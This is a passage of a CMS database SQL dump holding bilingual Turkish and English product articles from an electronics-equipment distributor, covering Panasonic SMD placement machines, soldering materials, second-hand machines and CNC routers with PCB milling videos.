":\"\",\"xreference\":\"\"}',0,'en-GB','',''),(79,195,'Panasonic AM100 Kampanya','panasonic-am100-kampanya','<p style=\"text-align: left;\">Dünya lideri Panasonic\'in yeni olarak çıkarmış olduğu AM100 SMD Dizgi Makinesinde Kampanya bulunmaktadır. AM100 SMD Dizgi makinesi, tek makine ile bütün elektronik üretim ihtiyaçlarınıza çözüm sunan bir makinedir. 01005\" chip malzemelerden, 100x90mm boyutuna kadar malzemeleri IPC: 22,000cph hızında ve toplam 96 feeder besleyicisinden alma özellikli Panasonic AM100 SMD Dizgi makinesi ve kampanya hakkında bilgi almak için bizleri arayınız...</p>','',1,80,'2014-08-04 06:47:14',676,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-08-04 06:47:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,7,'','',1,3762,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'tr-TR','',''),(80,196,'Panasonic AM100 Campaign','panasonic-am100-kampanya','<p><img src=\"images/panasonic/AM100.jpg\" width=\"500\" /></p>\r\n<p style=\"text-align: left;\">World-leader Panasonic has introduced the AM100 SMD Placement Machine and we are glad to inform that we have started a Special Promotion Campaign for this machine. The AM100 SMD P&amp;P is your single machine solution for all your electronic production needs. With IPC speed of 22,000cph, component placement range from 01005\" upto 100x90mm components and a maximum of 96 feeder slots, the Panasonic AM100 is your dream come true. To learn more about our campaign, please call us for details...</p>','',0,81,'2014-08-04 06:47:14',676,'','2020-11-25 18:25:22',676,0,'0000-00-00 00:00:00','2014-08-04 06:47:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,3,'','',1,5274,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'en-GB','',''),(81,197,'Panasonic AM100 Kampanya','panasonic-am100-kampanya-2','<p><img src=\"images/panasonic/AM100.jpg\" width=\"500\" /></p>\r\n<p style=\"text-align: left;\">Dünya lideri Panasonic, yeni AM100 SMD Dizgi makinesini satışa sunmuş bulunmaktadır ve bu makine ile yeni bir Kampanya başlatıldığını sizlere duyurmaktan gururluyuz.</p>\r\n','\r\n<p style=\"text-align: left;\">Panasonic AM100 SMD Dizgi makinesi, IPC 22,000cph hızı, 01005\" chip malzemelerden 100x90mm boyutunda tüm malzemeleri, toplam 96 feeder besleyiciden alma kabiliyetine sahiptir. Tek makine ile bütün elektronik üretim ihtiyaçlarınıza çözüm olmaktadır. Panasonic AM100 SMD Dizgi makinesi ve kampanyamız hakkında daha fazla bilgi için bizleri arayınız...</p>',0,80,'2014-08-04 06:47:14',676,'','2020-11-25 18:24:58',676,0,'0000-00-00 00:00:00','2014-08-04 06:47:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,6,'','',1,8074,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(82,198,'Başlangıç SMD Hatları','baslang-c-smd-hatlar','<p><img src=\"images/ddm/LE40V.png\" width=\"400\" /></p>\r\n<p style=\"text-align: left;\">Amerikan DDM Novastar firmasının düşük-orta hızlı SMD Hatları ve Dalga Lehim Makineleri, yüksek hacim gerektirmeyen - ancak, her türlü elektronik kartın üretimini yapabilecek kabiliyetdeki makineleri sunmaktadır.</p>\r\n','\r\n<p style=\"text-align: left;\">CS40, LE40V ve LS60V makineleri ile 1,800cph ile 4,800cph IPC hızlarında çözümler sunmaktadır. Ayrıca, hattı tamamlayacak manuel ve yarı otomatik krem lehim baskı makineleri, SMD Reflow fırınları, Dalga Lehim makineleri, Bölgesel Lehimleme makineleri ile üretim hattınızı tamamlayabilme imkanları sunmaktadır.</p>',1,80,'2014-08-04 07:05:57',676,'','2020-11-25 18:25:51',676,0,'0000-00-00 00:00:00','2014-08-04 07:05:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,5,'','',1,10516,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(83,199,'Starter SMD Lines','baslang-c-smd-hatlar','<p><img src=\"images/ddm/LE40V.png\" width=\"400\" /></p>\r\n<p style=\"text-align: left;\">American DDM Novastar - with its low-to-mid-speed SMD Lines and Wave-soldering Machines - is offering customers - not requiring high volume production - the means for producing all types of electronic boards. With the CS40, LE40V and LS60V series, IPC speeds from 1,800cph upto 4,800cph are achieved. Furthermore, manual and semi-automatic screen printers, wide range of SMD Reflow ovens and Selective Soldering machines enable the whole line to be completed easily.</p>','',1,81,'2014-08-04 07:05:57',676,'','2020-11-25 18:25:37',676,0,'0000-00-00 00:00:00','2014-08-04 07:05:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,2,'','',1,5256,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'en-GB','',''),(84,200,'Kester Lehimleme Malzemeleri','kester-lehimleme-malzemeleri','<p style=\"text-align: left;\">Lehimleme malzemelerinde dünya devi Kester firması tüm lehimleme ihtiyaçlarınıza çözümler sunmaktadır. Çubuk lehim, tel lehim, krem lehim, flux ile her türlü elektronik kartlarınızın kolay ve kalite bir şekilde lehimlenmesini sağlayabilirsiniz. Ekonomik kurşunsuz lehim K100 - kaliteden ödün vermeden ve SAC305\'e benzer özellikler ile - sizlere çubuk lehim, tel lehim - ve şimde de krem lehim de - ekonomik çözümler sunmaktadır.</p>','',0,80,'2014-08-04 07:12:25',676,'','2014-08-04 07:18:19',676,0,'0000-00-00 00:00:00','2014-08-04 07:12:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,4,'','',1,3959,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(85,201,'Kester Soldering Material','kester-lehimleme-malzemeleri','<p style=\"text-align: left;\">Kester is widely accepted world leader in soldering materials. With products ranging from solder bars, solder wire, solder paste and fluxes, Kester provides soldering solutions for all your electronic boards. Furthermore, for lead-free production, the K100 - while giving the full reliability of the SAC305 - provides an economical solution to your lead-free process - with products ranging from solder bar, solder wire - and now the newly introduced solder paste.</p>','',0,81,'2014-08-04 07:12:25',676,'','2014-08-04 07:16:15',676,0,'0000-00-00 00:00:00','2014-08-04 07:12:25','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,1,'','',1,2753,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'en-GB','',''),(86,202,'İkinci El Makineler','ikinci-el-makineler','<p style=\"text-align: left;\">Stoklarımızda Panasonic Aksiyel Dizgi Makineler (AVB, AVF), Panasonic Radyal Dizgi Makineleri (RH6, RHII, RHIII), Panasonic Kısa-Devre Dizgi Makineleri (JVK), Panasonic SMD Dizgi (MV2C-LL), Full-Otomatik Screen Printer (MPM UP-2000) gibi makineler bulunmaktadır. Detaylar ve fiyatlar i&ccedil;in bizi arayınız...</p>','',1,80,'2014-08-04 09:05:27',676,'','2019-09-16 13:07:38',676,0,'0000-00-00 00:00:00','2014-08-04 09:05:27','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,3,'','',1,6509,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'tr-TR','',''),(87,203,'Second-Hand Machines','ikinci-el-makineler','<p style=\"text-align: left;\">We have various second-hand machines in our stock - ranging from Panasonic Axial Insertion Machines (AVB, AVF), Panasonic Radial Insertion Machines (RH6, RHII, RHIII), Panasonic Jumper Wire Insertion Machines (JVK), Panasonic SMD P&amp;P (MV2C-LL), MPM UP-2000 (Screen Printer). Please call us for more details...</p>','',1,81,'2014-08-04 09:05:27',676,'','2014-08-04 09:08:23',676,0,'0000-00-00 00:00:00','2014-08-04 09:05:27','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,'','',1,5534,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'en-GB','',''),(88,219,'Eko CNC Routers','eko-cnc-en','<p><img src=\"images/cnc/1500x1500/center-comp-1-640x377.png\" alt=\"\" width=\"640\" height=\"377\" style=\"font-size: 12.012px;\" /></p>\r\n<p style=\"text-align: left;\">Based on your requests and requirements, we are glad to announce that we have started to manufacture economical CNC machines. These machines come from sizes of 750x750mm upto 1500x1500mm. The applications include milling PCB\'s, processing wood, processing policarbon and acrylic material, as well as working with aluminum. The machines are complete with \"plug&amp;play\" feature and can be mastered easily after basic training. We invite you to our Showroom for a more detailed demo...</p>','',0,79,'2014-08-04 06:47:14',676,'','2019-09-16 13:24:14',676,0,'0000-00-00 00:00:00','2014-08-04 06:47:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,'','',1,606,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'en-GB','',''),(89,220,'PCB Kazıma/Milling','pcb-kazıma-milling','<h2><span style=\"text-decoration: underline;\"><span style=\"color: #000000;\"><strong>PCB Kazıma / Milling Video&nbsp;</strong></span></span></h2>\r\n<p>{mp4}cnc/video/pcb-1{/mp4}</p>','',1,86,'2019-09-16 15:07:21',676,'','2019-09-17 10:37:14',676,0,'0000-00-00 00:00:00','2019-09-16 15:07:21','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,6,'','',1,4662,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(90,223,'PCB Bakır-dışı Alanlar / Non-copper Areas','pcb-non-copper','<h2><span>PCB Bakır Olmayan Alanların Kazınması</span></h2>\r\n<h2><span>Milling of non-copper Areas&nbsp;</span></h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/pcb-non_copper{/mp4}</p>','',1,86,'2019-09-16 15:56:33',676,'','2019-09-17 10:38:40',676,0,'0000-00-00 00:00:00','2019-09-16 15:56:33','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,7,'','',1,4276,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(91,224,'PCB Outline','pcb-outline','<h2>PCB &Ccedil;er&ccedil;evelerinin Kazınması</h2>\r\n<h2>Milling of PCB Outlines</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/pcb-outline{/mp4}</p>','',1,86,'2019-09-16 15:57:38',676,'','2019-09-17 10:37:14',676,0,'0000-00-00 00:00:00','2019-09-16 15:57:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,9,'','',1,4348,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(92,225,'PCB Delikleri / Holes','pcb-delikleri-holes','<h2>PCB Deliklerinin Delinmesi</h2>\r\n<h2>Drilling of PCB holes</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/pcb-holes{/mp4}</p>','',1,86,'2019-09-16 16:02:49',676,'','2019-09-17 10:37:14',676,0,'0000-00-00 00:00:00','2019-09-16 16:02:49','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,8,'','',1,4236,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(93,226,'PCB Seviyeleme / Self-Levelling','pcb-yükseklik-self-levelling','<h2>PCB Otomatik Seviye Ayarlanması</h2>\r\n<h2>Self-levelling of PCB Heights</h2>\r\n<p style=\"font-size: 12.012px;\">{mp4}cnc/video/pcb-self-levelling{/mp4}</p>','',1,86,'2019-09-16 16:04:17',676,'','2019-09-17 10:37:46',676,0,'0000-00-00 00:00:00','2019-09-16 16:04:17','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"article_layout\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_page_title\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,5,'','',1,4294,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*','',''),(94,229,'Eko CNC Makineleri','eko-cnc-tr','<p><img src=\"images/cnc/1500x1500/center-comp-1-640x377.png\" alt=\"\" width=\"640\" height=\"377\" style=\"font-size: 12.012px;\" /></p>\r\n<p style=\"text-align: left;\">Sizlerin talep ve ihtiya&ccedil;ları doğrultusunda, kaliteli ve 